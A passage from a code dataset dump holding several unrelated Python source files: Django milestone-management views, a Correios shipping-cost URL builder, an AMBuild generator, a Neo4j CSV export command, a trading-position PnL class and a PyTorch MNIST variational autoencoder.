= Client.objects.get(pk=client_id)\n f.client = client_obj\n #f.save()\n if project_id:\n project_obj = Project.objects.get(pk=project_id)\n f.project = project_obj\n f.save()\n if available_task:\n for i in available_task:\n f.available_task.remove(i)\n for i in available_task:\n f.available_task.add(i)\n f.save()\n msg = \"successfully saved\"\n return HttpResponseRedirect(\"/milestones/\")\n else:\n error = \"form error\"\n msg = \"Please check the particulars\"\n elif task == \"edit\":\n id_edit = id\n msg = ''\n #todays = datetime.date.today()+timedelta(days=7)\n mile = Milestone.objects.get(id=id_edit)\n f = Milestone_Form(request.user.pk)\n form = f(instance=mile)\n if request.POST:\n form = f(request.POST, instance=mile)\n available_task = request.POST.getlist('available_task', '')\n if form.is_valid():\n f = form.save(commit=False)\n #if not Milestone.objects.filter(title = request.POST.get\\\n #('title')).exclude(id=mile.id).exists():\n client_id = request.POST.get('client','')\n if client_id:\n client_obj = Client.objects.get(pk=client_id)\n f.client = client_obj\n project_id = request.POST.get('project','')\n if project_id:\n project_obj = Project.objects.get(pk=project_id)\n f.project = project_obj\n f.save()\n if available_task:\n for i in available_task:\n f.available_task.remove(i)\n for i in available_task:\n f.available_task.add(i)\n f.save()\n edit_done = True\n msg = \"edited successfully\"\n success = True\n return HttpResponseRedirect(\"/milestones/\")\n else:\n msg='Invalid form'\n return render(request, \"milestones/milestone-add.html\", locals(), \n context_instance = RequestContext(request))\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef _filter_function(request, milestone_list):\n todays = datetime.date.today()\n #milestone_list = Milestone.objects.filter(owned_by__user=request.user)\n task = Tasks.objects.all()\n project_list=Project.objects.all()\n clients=Client.objects.all()\n peoples = UserProfile.objects.all()\n milestone = Milestone.objects.all()\n client_id = request.GET.get('client', '')\n project_id = request.GET.get('projects', '')\n owned_by_id = request.GET.get('owners', '')\n milestone_id = request.GET.get('milestones', '')\n title = request.GET.get('milestone-title', '')\n status = request.GET.get('status', '')\n if client_id:\n client_obj = Client.objects.filter(id=client_id)\n milestone_list = milestone_list.filter(client=client_obj)\n if project_id:\n milestone_list= milestone_list.filter(project__id=project_id)\n if owned_by_id:\n milestone_list = milestone_list.filter(owned_by__id=owned_by_id)\n if status:\n todays = datetime.date.today()\n if status == 'Overdue':\n milestone_list = milestone_list.filter(due_date__lt=todays, status=False)\n elif status == 'Complete':\n milestone_list = milestone_list.filter(status=True)\n elif status == 'In Progress':\n milestone_list = milestone_list.filter(status=False).exclude(due_date__lt=todays)\n if milestone_id:\n milestone_list = milestone_list.filter(milestone__id=milestone_id)\n if title:\n milestone_list = milestone_list.filter(title__icontains=title)\n milestoness=milestone_list\n return render(request, \"milestones/milestone-home.html\", locals())\n\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef mile(request):\n for i in request.user.userprofile_set.all():\n if i.access_level == '1':\n return _filter_function(request, Milestone.objects.all())\n return milestone_owned_by(request)\n\n\n'''@login_required(login_url=\"/login/\")\ndef editmilestone(request, id_edit):\n 
msg = ''\n #todays = datetime.date.today()+timedelta(days=7)\n mile = Milestone.objects.get(id=id_edit)\n form = MilestoneForm(instance = mile)\n if request.POST:\n form = MilestoneForm(request.POST, instance = mile)\n if form.is_valid():\n f = form.save(commit=False)\n if not Milestone.objects.filter(title = request.POST.get('title')).exclude(id=mile.id).exists():\n f.save()\n edit_done = True\n msg = \"edited successfully\"\n success = True\n return HttpResponseRedirect(\"/milestones/\")\n else:\n msg = \"Already Exists!!\"\n print msg,'msg'\n else:\n msg='Invalid form'\n return render(request,\"milestones/milestone-add.html\",locals())\n'''\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef milestone_owned_by(request):\n\n milestone_list = Milestone.objects.filter(owned_by__user=request.user)\n return _filter_function(request, milestone_list)\n\n\n@login_required(login_url=\"/login/\")\ndef milestone_documents(request):\n documents = Milestone_Document.objects.all()\n return render(request, \"milestones/milestone-home.html\", locals())\n\n\n@login_required(login_url=\"/login/\")\ndef addmilestonedocument(request):\n form = Milestone_DocumentForm()\n error = ''\n msg = ''\n nam = ''\n x = ''\n f = ''\n if request.method == 'POST':\n form = Milestone_DocumentForm(request.POST, request.FILES)\n files = request.POST.get('files')\n if form.is_valid():\n f = form.save(commit=False)\n f.save()\n msg = \"successfully saved\"\n return HttpResponseRedirect(\"/milestones/\")\n else:\n error = \"form error\"\n msg = \"invalid\"\n \n return render(request, \"milestones/milestonedocument.html\", \\\n locals(), context_instance = RequestContext(request))\n\n@login_required(login_url=\"/login/\")\ndef editmilestonedocument(request, id_edit):\n msg = ''\n doc = Milestone_Document.objects.get(id=id_edit)\n form = Milestone_DocumentForm(instance = doc)\n files = request.POST.get('files')\n if request.POST:\n form = Milestone_DocumentForm(request.POST, instance = doc)\n if form.is_valid():\n f = form.save(commit=False)\n if not Milestone_Document.objects.filter(files = request.POST.get('files')).exclude(id=doc.id).exists():\n f.save()\n edit_done = True\n msg = \"edited successfully\"\n success = True\n return HttpResponseRedirect(\"/milestones/\")\n else:\n msg = \"Already Exists!!\"\n else:\n msg='Invalid form'\n return render(request, \"milestones/milestonedocument.html\", locals())\n\n\n@login_required(login_url=\"/login/\")\ndef activemilestones(request, id_active):\n milestone_obj = Milestone.objects.get(id=id_active)\n milestone_obj.activate = 2\n milestone_obj.save()\n success = True\n msg = \"Milestone Deactivated Successfully\"\n return HttpResponseRedirect(\"/milestones/\")\n\n\n\n@login_required(login_url=\"/login/\")\ndef deletemilestones(request, id_delete):\n milestone_obj = Milestone.objects.get(id=id_delete)\n milestone_obj.activate = 0\n milestone_obj.save()\n success = True\n msg = \"Milestone Deactivated Successfully\"\n return HttpResponseRedirect(\"/milestones/\")\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef gettasks(request):\n result={}\n cid = request.GET.get('cid')\n if cid:\n client_obj = Client.objects.get(id=cid)\n project_obj =Project.objects.filter(client=client_obj).values('id','name')\n result['res'] = list(project_obj)\n return HttpResponse(json.dumps(result),mimetype = \"application/json\")\n\n\n@login_required(login_url = \"/login/\")\ndef gettasks_list(request):\n result = {}\n mid = request.GET.get('mid')\n if mid:\n tasks_obj = 
Tasks.objects.filter(project__id = mid).values('id','title')\n #Tasks.objects.filter(owned_by__user__id=id)\n result['res'] = list(tasks_obj)\n return HttpResponse(json.dumps(result), mimetype = \"application/json\")\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef getpeople(request):\n result={}\n pid = request.GET.get('pid')\n if pid:\n project_obj = Project.objects.get(id=pid)\n userprofile_obj =UserProfile.objects.filter(project=project_obj).values('id','first_name','last_name')\n result['res'] = list(userprofile_obj)\n return HttpResponse(json.dumps(result), mimetype = \"application/json\")\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef getstatus(request):\n result={}\n rid = request.GET.get('rid')\n if rid:\n employee_obj = Employee.objects.get(id=rid)\n milestone_obj = Milestone.objects.filter(employee=employee_obj).values('id','status')\n result['res'] = list(milestone_obj)\n return HttpResponse(json.dumps(result),mimetype = 'application/json')\n\n\nimport json\n@login_required(login_url=\"/login/\")\ndef getmilestones(request):\n result={}\n sid = request.GET.get('sid')\n if sid:\n milestone_obj =Milestone.objects.get(id=sid)\n milestones_obj =Milestone.objects.filter(milestone=milestone_obj).values('id','status')\n result['res'] = list(milestones_obj)\n return HttpResponse(json.dumps(result), mimetype = \"application/json\")\n\n\n\n@login_required(login_url=\"/login/\")\ndef import_data_m(request):\n key = request.GET.get('key')\n if request.method == \"POST\":\n csvfile = ''\n data_file = request.FILES.get('data_file')\n if key == \"milestones\":\n if data_file:\n csvfile = CSVFiles.objects.create(upload_file=data_file)\n csv_path = ('/home/mahadev/Desktop/pms/static/') + str(csvfile.upload_file)\n reader=csv.reader(open(csv_path,'rb'), delimiter=';')\n fields=reader.next()\n for i,item in enumerate(reader):\n items = zip(fields,item)\n row = {}\n for (name,value) in items:\n row[name]=value.strip()\n pl = Project()\n for x,y in row.items():\n setattr(pl, x, y)\n pl.save()\n msg_upload = \"Uploaded Successfully..\"\n return render(request, 'milestones/import-milestones.html', locals())\n\n\n\ndef search(request):\n try:\n q = request.GET['q']\n posts = Milestone.objects.filter(title__search=q)\n return render_to_response('milestones/index.html', locals())\n except KeyError:\n return render_to_response('milestones/index-home.html')\n\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef od(request):\n milestone_list = Milestone.objects.all()\n due_dates = milestone_list[0].due_date\n todays = datetime.date.today()\n return render(request,\"milestones/od.html\", locals(), context_instance = RequestContext(request))\n\n\ndef milestone_comment(request):\n success, msg, user, response = False, '', request.user, {}\n try:\n if request.method == 'POST':\n tid, val = request.POST.get('mid'), request.POST.get('val')\n if tid and val:\n milestone = Milestone.objects.get(pk = int(tid))\n content_type = ContentType.objects.get_for_model(milestone)\n site = Site.objects.get(pk = 1)\n comment = Comment.objects.create(content_type = content_type, \\\n object_pk = milestone.pk, comment = val, user = user, site = site)\n success, msg = True, \"Commented successfully.\"\n else:\n msg = \"Invalid Data\"\n else:\n msg = \"Error Occurred\"\n except Exception as e:\n msg = e.message\n response = {'success':success, 'msg':msg}\n return HttpResponse(json.dumps(response), 
mimetype=\"application/json\")\n\n\n\n","sub_path":"milestones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
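The _filter_function view in the record above narrows one queryset step by step, applying each filter only when the matching GET parameter was actually supplied. The same conditional-chaining pattern in a stripped-down sketch (the parameter names follow the record; the function name apply_filters is an assumption):

def apply_filters(qs, params):
    # Each filter is applied only if the request supplied that key;
    # an absent or empty parameter leaves the queryset untouched.
    if params.get('client'):
        qs = qs.filter(client__id=params['client'])
    if params.get('projects'):
        qs = qs.filter(project__id=params['projects'])
    if params.get('milestone-title'):
        qs = qs.filter(title__icontains=params['milestone-title'])
    return qs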
+{"seq_id":"529146602","text":"from .models import Carrinho\n\ndef calcular_frete(cep_destino, cep_origem='14407000', peso='2', tipo_frete='04014',\n altura='10', largura='20', comprimento='20'):\n url = 'http://ws.correios.com.br/calculador/CalcPrecoPrazo.aspx?'\n url += '&nCdEmpresa='\n url += '&sDsSenha='\n url += '&nCdServico=' + tipo_frete\n url += '&sCepOrigem=' + cep_origem\n url += '&sCepDestino=' + cep_destino\n url += '&nVlPeso=' + peso\n url += '&nCdFormato=1'\n url += '&nVlComprimento=' + comprimento\n url += '&nVlAltura=' + altura\n url += '&nVlLargura=' + largura\n url += '&nVlDiametro=0'\n url += '&sCdMaoPropria=n'\n url += '&nVlValorDeclarado=0'\n url += '&sCdAvisoRecebimento=n'\n url += '&StrRetorno=xml'\n url += '&nIndicaCalculo=3'\n\n return (url)\n\n\ndef prazo_maior_ano(request):\n if request.user.is_authenticated():\n carrinho = Carrinho.objects.filter(dono=request.user)\n if carrinho:\n lista_prazo = []\n for i in carrinho:\n lista_prazo.append(i.prazo)\n\n return (int(max(lista_prazo)))\n else:\n return (0)\n\n else:\n key = request.session.session_key\n\n carrinho = Carrinho.objects.filter(dono_ano=key).order_by('data_adc')\n if carrinho:\n lista_prazo = []\n for i in carrinho:\n lista_prazo.append(i.prazo)\n\n return (int(max(lista_prazo)))\n\n else:\n return (0)","sub_path":"oticas/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172313658","text":"# vim: set ts=8 sts=2 sw=2 tw=99 et:\n#\n# This file is part of AMBuild.\n#\n# AMBuild is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# AMBuild is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with AMBuild. If not, see .\nimport ambuild2.frontend.vs.gen as vs_gen\nfrom ambuild2.frontend.v2_1.vs import cxx\n\nclass Generator(vs_gen.Generator):\n def __init__(self, cm):\n super(Generator, self).__init__(cm)\n\n # Overridden.\n def detectCompilers(self, options):\n if not self.compiler:\n version = cxx.Compiler.GetVersionFromVS(self.vs_version)\n vendor = cxx.VisualStudio(version)\n self.base_compiler = cxx.Compiler(vendor)\n self.compiler = self.base_compiler.clone()\n return self.compiler\n","sub_path":"ambuild2/frontend/v2_1/vs/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"531901943","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport os\nimport re\nimport os.path\n\nimport csv\nfrom unicodecsv import writer\nfrom tqdm import tqdm\nfrom neomodel import StringProperty, BooleanProperty, IntegerProperty, FloatProperty\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom core.models import (\n Person,\n Company,\n Country,\n Person2Person,\n Company2Company,\n Person2Company,\n Company2Country,\n Person2Country,\n)\n\n\nfrom core.neo_models import (\n Person as NeoPerson,\n Company as NeoCompany,\n Country as NeoCountry,\n Company2Company as NeoCompany2Company,\n Person2Company as NeoPerson2Company,\n Person2Person as NeoPerson2Person,\n)\n\n\nclass Command(BaseCommand):\n neomodel_to_types_mapping = {\n IntegerProperty: \"INT\",\n StringProperty: \"STRING\",\n BooleanProperty: \"BOOLEAN\",\n FloatProperty: \"FLOAT\",\n }\n\n def add_arguments(self, parser):\n parser.add_argument(\"output_dir\", help=\"Directory to export CSVs\")\n\n def norm_str(self, s):\n if isinstance(s, bool):\n return \"true\" if s else \"false\"\n\n return re.sub(\"\\s+\", \" \", unicode(s).replace(\"\\n\", \" \").strip())\n\n def get_field_types(self, neo_model):\n field_types = {}\n\n if neo_model is not None:\n for prop, cls in neo_model.defined_properties().items():\n field_types[prop] = self.neomodel_to_types_mapping.get(\n type(cls), \"string\"\n )\n\n return field_types\n\n def export_nodes(self, fname, qs, neo_model=None, labels=[]):\n field_types = self.get_field_types(neo_model)\n\n self.nodes.append(os.path.basename(fname))\n with open(fname, \"w\") as fp:\n w = writer(fp, quoting=csv.QUOTE_ALL)\n id_fields = \"%sId:ID(%s)\" % (qs.model.__name__.lower(), qs.model.__name__)\n\n first = qs.first()\n fields = list(first.get_node()[\"data\"].keys())\n\n w.writerow(\n [id_fields]\n + list(\"{}:{}\".format(k, field_types.get(k, \"STRING\")) for k in fields)\n + [\":LABEL\"]\n )\n\n for obj in tqdm(qs.iterator(), total=qs.count()):\n row = [obj.pk]\n node_info = obj.get_node()[\"data\"]\n\n row += [self.norm_str(node_info[f]) for f in fields]\n\n row.append(\";\".join(labels))\n w.writerow(row)\n\n def export_relations(self, fname, qs, src, dst, neo_model=None):\n field_types = self.get_field_types(neo_model)\n\n self.relationships.append(os.path.basename(fname))\n\n with open(fname, \"w\") as fp:\n w = writer(fp, quoting=csv.QUOTE_ALL)\n if_fld_from = getattr(qs.model, src).field.related_model.__name__\n if_fld_to = getattr(qs.model, dst).field.related_model.__name__\n\n first = qs.first()\n fields = list(first.get_node()[\"data\"].keys())\n\n w.writerow(\n [\":START_ID(%s)\" % if_fld_from, \":END_ID(%s)\" % if_fld_to, \":TYPE\"]\n + list(\"{}:{}\".format(k, field_types.get(k, \"STRING\")) for k in fields)\n )\n\n for obj in tqdm(qs.iterator(), total=qs.count()):\n row = [\n getattr(obj, src + \"_id\"),\n getattr(obj, dst + \"_id\"),\n qs.model.__name__,\n ]\n\n node_info = obj.get_node()[\"data\"]\n\n row += [self.norm_str(node_info[f]) for f in fields]\n\n w.writerow(row)\n\n def handle(self, *args, **options):\n output_dir = options[\"output_dir\"]\n self.relationships = []\n self.nodes = []\n\n try:\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n except OSError:\n raise CommandError(\"Cannot create output dir\")\n\n self.export_nodes(\n os.path.join(output_dir, \"persons.csv\"),\n Person.objects.all().nocache(),\n neo_model=NeoPerson,\n labels=[\"Person\"],\n )\n\n 
self.export_nodes(\n os.path.join(output_dir, \"companies.csv\"),\n Company.objects.all().nocache(),\n neo_model=NeoCompany,\n labels=[\"Company\"],\n )\n\n self.export_nodes(\n os.path.join(output_dir, \"countries.csv\"),\n Country.objects.exclude(iso2=\"\").nocache(),\n neo_model=NeoCountry,\n labels=[\"Country\"],\n )\n\n self.export_relations(\n os.path.join(output_dir, \"person2person.csv\"),\n Person2Person.objects.all().nocache(),\n \"from_person\",\n \"to_person\",\n neo_model=NeoPerson2Person,\n )\n\n self.export_relations(\n os.path.join(output_dir, \"person2company.csv\"),\n Person2Company.objects.all().nocache(),\n \"from_person\",\n \"to_company\",\n neo_model=NeoPerson2Company,\n )\n\n self.export_relations(\n os.path.join(output_dir, \"company2company.csv\"),\n Company2Company.objects.all().nocache(),\n \"to_company\",\n \"from_company\",\n neo_model=NeoCompany2Company,\n )\n\n # self.export_relations(\n # os.path.join(output_dir, \"person2country.csv\"),\n # Person2Country.objects.all().nocache(),\n # \"from_person\",\n # \"to_country\",\n # [\n # \"relationship_type\",\n # \"date_established_human\",\n # \"date_finished_human\",\n # \"date_confirmed_human\",\n # \"proof_title\",\n # \"proof\",\n # ],\n # )\n\n # self.export_relations(\n # os.path.join(output_dir, \"company2country.csv\"),\n # Company2Country.objects.all().nocache(),\n # \"from_company\",\n # \"to_country\",\n # [\n # \"relationship_type\",\n # \"date_established_human\",\n # \"date_finished_human\",\n # \"date_confirmed_human\",\n # \"proof_title\",\n # \"proof\",\n # ],\n # )\n\n with open(os.path.join(output_dir, \"neo4j_import.sh\"), \"w\") as fp:\n cmd = \"{} import --id-type=INTEGER --database={} \\\\\\n\"\n fp.write(\n cmd.format(settings.NEO4J_ADMIN_PATH, settings.NEO4J_DATABASE_NAME)\n )\n fp.write(\"\\t--multiline-fields=true \\\\\\n\")\n\n for node in self.nodes:\n cmd = \"\\t--nodes={} \\\\\\n\"\n fp.write(cmd.format(node))\n\n for relationship in self.relationships:\n cmd = \"\\t--relationships={} \\\\\\n\"\n fp.write(cmd.format(relationship))\n","sub_path":"pepdb/core/management/commands/export_to_neo4j.py","file_name":"export_to_neo4j.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
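The exporter above depends on the CSV header conventions that neo4j-admin import understands: node files carry a typed ':ID(namespace)' column plus a ':LABEL' column, relationship files carry ':START_ID', ':END_ID' and ':TYPE'. A self-contained sketch of those headers with made-up sample rows (the values are illustrative, not project data):

import csv
import io

buf = io.StringIO()
w = csv.writer(buf, quoting=csv.QUOTE_ALL)
# Node file: ID column namespaced by entity, typed properties, label column.
w.writerow(['personId:ID(Person)', 'name:STRING', ':LABEL'])
w.writerow([1, 'Jane Doe', 'Person'])
# Relationship file: endpoints reference the node namespaces, plus a type.
w.writerow([':START_ID(Person)', ':END_ID(Company)', ':TYPE'])
w.writerow([1, 7, 'Person2Company'])
print(buf.getvalue())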
+{"seq_id":"469254002","text":"import warnings\n\nfrom quote import Quote\nfrom limit_order_book import LimitOrderBook\nfrom buy_sell import BuySell\n\n\nclass TradeSituation:\n # This variable will be incremented after each call of TradeSituation.generate_next_id().\n # It is used to populate __trade_situation_id.\n __common_trade_situation_id: int = 0\n # This is a global reference to the order book\n __common_order_book: LimitOrderBook\n # Instance attributes\n # Unique ID of the trade_situation\n __trade_situation_id: int\n # If True: it's a LONG (BUY) trade. If False: it's a SHORT (SELL) trade.\n __is_long_trade: bool\n # Quote saved when we opened the position\n __executed_open_quote: Quote\n # Reference quote when position opened.\n __arrived_open_quote: Quote\n # Quote saved when we close the position\n __executed_close_quote: Quote\n # Reference quote when position closed.\n __arrived_close_quote: Quote\n # Flag used to describe if the position is opened or closed\n __is_closed: bool\n # Maximum draw down in basis points. Always positive!\n __max_dd_in_bps: float\n # Latest profit or loss of the position in basis points\n __pnl_bps: float\n # Take profit in basis points\n __take_profit_in_bps: float\n # Trading amount\n __amount: float\n # This variable describes that we are using the best BID and best OFFER to calculate PnL\n __is_best_price_calculation: bool\n\n def __init__(self, open_order_arg: Quote, is_long_trade_arg: bool, take_profit_in_bps_arg: float, amount: float,\n is_best_px_calc: bool):\n # Init locals\n self.__max_dd_in_bps = 0.00\n self.__pnl_bps = 0.00\n self.__is_closed = True\n # Update and set the __trade_situation_id\n self.__trade_situation_id = TradeSituation.generate_next_id()\n # Check arguments sanity.\n if take_profit_in_bps_arg < 0.00:\n raise Exception(\"Please note that the take profit has to be positive (:2.2f)\"\n .format(take_profit_in_bps_arg))\n # Set up the rest of variables\n self.__is_best_price_calculation = is_best_px_calc\n self.__is_long_trade = is_long_trade_arg\n self.__take_profit_in_bps = take_profit_in_bps_arg\n self.__amount = amount\n # Call self.open_position(...) to open the position immediately\n self.open_position(open_order_arg)\n\n def open_position(self, quote_arg: Quote):\n \"\"\"\n Flags the is_closed to False. Saves the entry order.\n :param quote_arg: quote class's instance expected. The first quote.\n :return:\n \"\"\"\n # Sets the __executed_open_quote to argument's value and flags __is_closed to FALSE\n opening_quote_way: BuySell = BuySell.SELL if self.__is_long_trade else BuySell.BUY\n self.__executed_open_quote = TradeSituation.__common_order_book.get_best_orders_by_amount(opening_quote_way,\n self.__amount)\n self.__arrived_open_quote = quote_arg\n self.__is_closed = False\n\n def close_position(self, quote_arg: Quote):\n \"\"\"\n Flags the position as closed. 
Calculates final PnL\n :param quote_arg: last quote\n :return:\n \"\"\"\n # Reference quote\n self.__arrived_close_quote = quote_arg\n # Sets the __executed_close_quote to argument's value, flags __is_closed to TRUE\n if self.__is_long_trade:\n self.__executed_close_quote = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.BUY,\n self.__amount)\n else:\n self.__executed_close_quote = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.SELL,\n self.__amount)\n if self.__executed_close_quote is not None:\n if self.__is_long_trade:\n # Buy with Offer, close the position with Bid\n self.__pnl_bps = self.__executed_close_quote.price() - self.__executed_open_quote.price()\n else:\n # Sell with Bid, close the position with Offer\n self.__pnl_bps = self.__executed_open_quote.price() - self.__executed_close_quote.price()\n # otherwise keep the approx PNL\n else:\n warnings.warn(\"Could not retrieve the corresponding order to close the position\", RuntimeWarning)\n\n self.__is_closed = True\n\n def update_on_order(self, quote_arg: Quote) -> bool:\n \"\"\"\n Updates all the variables in the position. Calculates the PnL.\n :param quote_arg: the latest quote\n :return: returns True if the position was closed (target profit reached)\n \"\"\"\n # Check if the position is alive. Return false if the position is dormant\n if self.__is_closed:\n return False\n # Check/update current pnl and draw down\n self.calculate_pnl_and_dd()\n # Check if target pnl was reached\n if self.__pnl_bps >= self.__take_profit_in_bps:\n # Target pnl reached: close position\n self.close_position(quote_arg)\n return True\n\n # PnL target not reached: return false\n return False\n\n def calculate_pnl_and_dd(self) -> float:\n \"\"\"\n Calculates (and updates) the PnL and draw down for the position\n :param quote_arg: the current quote. Given only for statistics purpose. 
The best price is kept in the order book\n :return: current pnl\n \"\"\"\n # In case the position is not opened (not alive) return the value stored in __pnl_bps\n if self.__is_closed:\n return self.__pnl_bps\n\n # Calculate pnl (different for LONG and SHORT; if we use the best price or not)\n if self.__is_best_price_calculation:\n # Get the best price on market (faster)\n if self.__is_long_trade:\n if TradeSituation.__common_order_book.get_best_bid() is not None:\n price_reference = TradeSituation.__common_order_book.get_best_bid_price()\n else:\n # No price available\n return self.__pnl_bps\n else:\n if TradeSituation.__common_order_book.get_best_offer() is not None:\n price_reference = TradeSituation.__common_order_book.get_best_offer_price()\n else:\n # No price available\n return self.__pnl_bps\n else:\n # Get the price by amount (slower)\n if self.__is_long_trade:\n corresponding_order = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.BUY,\n self.__amount)\n else:\n corresponding_order = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.SELL,\n self.__amount)\n if corresponding_order is not None:\n price_reference = corresponding_order.price()\n else:\n # No price available\n return self.__pnl_bps\n\n if self.__is_long_trade:\n # Buy with Offer, close the position with Bid\n self.__pnl_bps = price_reference - self.__executed_open_quote.price()\n else:\n # Sell with Bid, close the position with Offer\n self.__pnl_bps = self.__executed_open_quote.price() - price_reference\n\n # Calculate draw down\n if self.__pnl_bps < 0.00 and -self.__pnl_bps > self.__max_dd_in_bps:\n self.__max_dd_in_bps = -self.__pnl_bps\n\n # return __pnl_bps\n return self.__pnl_bps\n\n def return_current_pnl(self) -> float:\n \"\"\"\n Returns the current (or final if the position is closed) pnl.\n :return:\n \"\"\"\n return self.__pnl_bps\n\n def return_current_draw_down(self) -> float:\n \"\"\"\n Returns the current (or final if the position is closed) maximum draw down.\n :return:\n \"\"\"\n return self.__max_dd_in_bps\n\n def trade_situation_id(self) -> int:\n \"\"\"\n Returns this trade situation ID\n :return:\n \"\"\"\n return self.__trade_situation_id\n\n def is_closed(self):\n \"\"\"\n Returns true if the position was closed previously\n :return:\n \"\"\"\n return self.__is_closed\n\n @staticmethod\n def generate_next_id():\n TradeSituation.__common_trade_situation_id += 1\n return TradeSituation.__common_trade_situation_id\n\n @staticmethod\n def set_limit_order_book(limit_order_book: LimitOrderBook):\n TradeSituation.__common_order_book = limit_order_book\n","sub_path":"trade_situation.py","file_name":"trade_situation.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
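Underneath all the branching in TradeSituation, the mark-to-market rule is symmetric: a long position gains when the reference price rises above the entry, a short gains when it falls below. A condensed sketch of that rule (function and variable names are assumptions):

def pnl(is_long_trade, open_price, reference_price):
    # Long: entered at the offer, marked against the bid (reference).
    # Short: entered at the bid, marked against the offer (reference).
    if is_long_trade:
        return reference_price - open_price
    return open_price - reference_price

assert pnl(True, 100.0, 100.5) == 0.5   # long, market moved up
assert pnl(False, 100.0, 99.5) == 0.5   # short, market moved down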
+{"seq_id":"125016645","text":"# variational auto encoders\nfrom __future__ import print_function\nfrom __future__ import division\nfrom torchvision import models\nfrom torchvision import transforms\nfrom torchvision import datasets\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\nimport argparse\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport time\nimport sys\nimport re\nimport os\nimport imageio\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nparser = argparse.ArgumentParser()\nsubparsers = parser.add_subparsers(title=\"subcommands\", dest=\"subcommand\")\n\ntrain_parser = subparsers.add_parser(\"train\")\ntrain_parser.add_argument('--batch_size', type=int, default=128, metavar=\"N\",\n help=\"input batch size for training (default: 128)\")\ntrain_parser.add_argument('--epochs', type=int, default=20, metavar=\"N\",\n help=\"number of epoches to train (default: 10)\")\ntrain_parser.add_argument('--log_step', type=int, default=20,\n metavar=\"N\", help=\"number of steps to print log\")\n\neval_parser = subparsers.add_parser(\"eval\")\neval_parser.add_argument('--batch_size', type=int, default=128, metavar=\"N\",\n help=\"input batch size for training (default: 128)\")\neval_parser.add_argument('--model', type=str, required=True)\nconfig = parser.parse_args()\n\n\ntrain_loader = DataLoader(\n datasets.MNIST('../dataset', train=True, download=True,\n transform=transforms.ToTensor()),\n batch_size=config.batch_size,\n shuffle=True\n)\ntest_loader = DataLoader(\n datasets.MNIST('../dataset', train=False, transform=transforms.ToTensor()),\n batch_size=config.batch_size,\n shuffle=True\n)\n\n\nclass VAE(nn.Module):\n def __init__(self):\n super(VAE, self).__init__()\n\n self.fc1 = nn.Linear(784, 400)\n self.fc21 = nn.Linear(400, 20)\n self.fc22 = nn.Linear(400, 20)\n self.fc3 = nn.Linear(20, 400)\n self.fc4 = nn.Linear(400, 784)\n\n def encode(self, x):\n h1 = F.relu(self.fc1(x))\n return self.fc21(h1), self.fc22(h1)\n\n def reparameterize(self, mu, logvar):\n if self.training:\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return eps.mul(std).add_(mu)\n else:\n return mu\n\n def decode(self, z):\n h3 = F.relu(self.fc3(z))\n return torch.sigmoid(self.fc4(h3))\n\n def forward(self, x):\n mu, logvar = self.encode(x.view(-1, 784))\n z = self.reparameterize(mu, logvar)\n return self.decode(z), mu, logvar\n\n\ndef loss_function(recon_x, x, mu, logvar):\n BCE = F.binary_cross_entropy(recon_x, x.view(-1, 784), reduction='sum')\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return BCE + KLD\n\n\ndef train(config, epoch):\n model.train()\n train_loss = 0\n for batch_idx, (data, _) in enumerate(train_loader):\n data = data.to(device)\n optimizer.zero_grad()\n recon_batch, mu, logvar = model(data)\n loss = loss_function(recon_batch, data, mu, logvar)\n loss.backward()\n train_loss += loss.item()\n optimizer.step()\n if batch_idx % config.log_step == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\t Loss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset), 100. 
